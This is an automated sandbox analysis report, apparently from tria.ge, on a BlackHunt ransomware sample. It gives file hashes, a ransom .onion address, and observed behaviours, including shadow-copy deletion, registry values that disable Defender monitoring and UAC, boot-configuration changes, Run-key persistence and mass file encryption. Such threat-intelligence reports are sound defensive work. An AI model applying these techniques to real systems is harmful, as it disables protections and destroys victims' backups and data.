Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
164s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
19/01/2024, 00:01
Static task
static1
Behavioral task
behavioral1
Sample
8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe
Resource
win10v2004-20231222-en
General
-
Target
8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe
-
Size
707KB
-
MD5
72f384d95443571f4de95764b42c98e4
-
SHA1
1e0cc668e012de3ab16aea91d4dfab5876729c43
-
SHA256
8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048
-
SHA512
3de8c5c8399fd178c3a873ead7d3eb2c32e144e8e1b32fb6247ea738b8473f248224985047872855b700e3cc35bd3fa33139ff520b8ac052ec94c854327ebc6d
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1t8cvnh:6uaTmkZJ+naie5OTamgEoKxLWwCh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1760 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1784 bcdedit.exe 3028 bcdedit.exe -
Renames multiple (1843) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2304 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\X: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\G: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\Z: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\B: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\E: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\T: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\Y: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\Q: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\O: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\J: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\V: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\W: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\S: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\K: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\N: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\L: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\R: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\I: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\P: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\A: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened (read-only) \??\H: 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\es.txt 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\redmenu.png 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Algiers 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh88 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\#BlackHunt_ReadMe.txt 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\7-Zip\#BlackHunt_Private.key 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\7-Zip\Lang\az.txt 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.ja_5.5.0.165303.jar 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\#BlackHunt_ReadMe.txt 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\7-Zip\#BlackHunt_ReadMe.txt 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_ButtonGraphic.png 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_scrapbook_Thumbnail.bmp 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#BlackHunt_ReadMe.txt 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yakutsk 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_ja_4.4.0.v20140623020002.jar 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\full.png 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#BlackHunt_Private.key 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\#BlackHunt_ReadMe.txt 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\#BlackHunt_Private.key 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#BlackHunt_Private.key 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-lib-uihandler.xml_hidden 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+2 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\whiteband.png 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.policy 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novosibirsk 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Samarkand 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Bougainville 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#BlackHunt_ReadMe.hta 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\203x8subpicture.png 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\#BlackHunt_ReadMe.txt 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#BlackHunt_ReadMe.txt 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\net.properties 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.properties 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\DVD Maker\de-DE\#BlackHunt_ReadMe.hta 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Denver 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.change_2.10.0.v20140901-1043.jar 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\DVD Maker\Shared\DissolveNoise.png 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\NextMenuButtonIconSubpictur.png 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_it.properties 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Menominee 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\.data\#BlackHunt_ReadMe.txt 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\#BlackHunt_ReadMe.hta 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationLeft_SelectionSubpicture.png 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\ffjcext.zip 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\#BlackHunt_ReadMe.hta 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-uihandler.xml_hidden 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-foreground.png 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\#BlackHunt_ReadMe.hta 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-next-static.png 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\NavigationLeft_SelectionSubpicture.png 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\#BlackHunt_ReadMe.txt 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Costa_Rica 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\#BlackHunt_ReadMe.txt 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe File created C:\Program Files\DVD Maker\fr-FR\#BlackHunt_ReadMe.txt 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1820 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2876 vssadmin.exe 932 vssadmin.exe 1932 vssadmin.exe 2052 vssadmin.exe 2984 vssadmin.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon schtasks.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" schtasks.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe Token: SeRestorePrivilege 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe Token: SeBackupPrivilege 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe Token: SeTakeOwnershipPrivilege 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe Token: SeAuditPrivilege 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe Token: SeSecurityPrivilege 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe Token: SeIncBasePriorityPrivilege 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe Token: SeBackupPrivilege 2300 vssvc.exe Token: SeRestorePrivilege 2300 vssvc.exe Token: SeAuditPrivilege 2300 vssvc.exe Token: SeBackupPrivilege 2284 wbengine.exe Token: SeRestorePrivilege 2284 wbengine.exe Token: SeSecurityPrivilege 2284 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1720 wrote to memory of 2460 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 30 PID 1720 wrote to memory of 2460 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 30 PID 1720 wrote to memory of 2460 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 30 PID 1720 wrote to memory of 2460 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 30 PID 1720 wrote to memory of 2264 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 31 PID 1720 wrote to memory of 2264 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 31 PID 1720 wrote to memory of 2264 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 31 PID 1720 wrote to memory of 2264 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 31 PID 1720 wrote to memory of 2888 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 33 PID 1720 wrote to memory of 2888 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 33 PID 1720 wrote to memory of 2888 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 33 PID 1720 wrote to memory of 2888 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 33 PID 1720 wrote to memory of 2488 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 36 PID 1720 wrote to memory of 2488 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 36 PID 1720 wrote to memory of 2488 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 36 PID 1720 wrote to memory of 2488 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 36 PID 1720 wrote to memory of 2840 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 37 PID 1720 wrote to memory of 2840 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 37 PID 1720 wrote to memory of 2840 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 37 PID 1720 wrote to memory of 2840 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 37 PID 1720 wrote to memory of 2588 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 39 PID 1720 wrote to memory of 2588 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 39 PID 1720 wrote to memory of 2588 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 39 PID 1720 wrote to memory of 2588 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 39 PID 1720 wrote to memory of 2704 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 41 PID 1720 wrote to memory of 2704 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 41 PID 1720 wrote to memory of 2704 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 41 PID 1720 wrote to memory of 2704 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 41 PID 1720 wrote to memory of 2468 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 44 PID 1720 wrote to memory of 2468 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 44 PID 1720 wrote to memory of 2468 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 44 PID 1720 wrote to memory of 2468 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 44 PID 1720 wrote to memory of 2496 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 45 PID 1720 wrote to memory of 2496 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 45 PID 1720 wrote to memory of 2496 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 45 PID 1720 wrote to memory of 2496 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 45 PID 1720 wrote to memory of 2572 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 131 PID 1720 wrote to memory of 2572 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 131 PID 1720 wrote to memory of 2572 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 131 PID 1720 wrote to memory of 2572 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 131 PID 2888 wrote to memory of 3052 2888 cmd.exe 49 PID 2888 wrote to memory of 3052 2888 cmd.exe 49 PID 2888 wrote to memory of 3052 2888 cmd.exe 49 PID 1720 wrote to memory of 2504 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 50 PID 1720 wrote to memory of 2504 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 50 PID 1720 wrote to memory of 2504 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 50 PID 1720 wrote to memory of 2504 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 50 PID 1720 wrote to memory of 3020 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 51 PID 1720 wrote to memory of 3020 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 51 PID 1720 wrote to memory of 3020 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 51 PID 1720 wrote to memory of 3020 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 51 PID 1720 wrote to memory of 2132 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 148 PID 1720 wrote to memory of 2132 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 148 PID 1720 wrote to memory of 2132 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 148 PID 1720 wrote to memory of 2132 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 148 PID 1720 wrote to memory of 1600 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 55 PID 1720 wrote to memory of 1600 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 55 PID 1720 wrote to memory of 1600 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 55 PID 1720 wrote to memory of 1600 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 55 PID 1720 wrote to memory of 268 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 57 PID 1720 wrote to memory of 268 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 57 PID 1720 wrote to memory of 268 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 57 PID 1720 wrote to memory of 268 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 57 PID 1720 wrote to memory of 340 1720 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe 59 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 8704e439806fe93dbd485e1f114a7048e068b2e655c68806731e9b95e23c9048.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
